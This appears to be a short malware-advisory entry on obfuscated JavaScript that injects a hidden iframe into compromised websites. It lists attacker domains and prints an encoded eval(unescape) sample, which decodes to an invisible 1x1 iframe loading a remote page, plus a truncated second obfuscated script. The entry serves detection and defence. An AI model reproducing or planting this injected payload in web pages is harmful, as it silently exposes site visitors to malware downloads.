Description: Javascript encoding used to hide a malicious iframe.
Sites used in this attack:
http://bodisparking.com/
http://astped.com/
http://bedfer.com/
http://cerpoo.com/
http://jikped.com/
http://jorped.com/
http://kevfer.com/
http://naurup.com/
http://pempoo.com/
http://podfer.com/
http://quaped.com/
http://qutped.com/
http://saspoo.com/
http://sedpoo.com/
http://tivped.com/
http://verfer.com/
http://xedfer.com/
http://xetpoo.com (and many others)
This is used to load malware from external web sites while not being visible to
the user.
Affecting: Any web site (no specific target)
Details: Usually starts with a "eval(unescape" followed by
a large chunck of encoding text.
Malware sample:
eval (unescape("%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%62%69%62%7A%6F%70%6C%2E%63%6F%6D%2F%69%6E%2E%70%68%70%22%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31%20%66%72%61%6D%65%62%6F%72%64%65%72%3D%30%3E%3C%2F%69%66%72%61%6D%65%3E%27%29%3B"))
str='@3C@73@63@72@69@70@74@20@6C@61@6E@67@75@61@67@65@3D@22@6A@61..
document . write(unescape(str.replace(/@/g,'%')));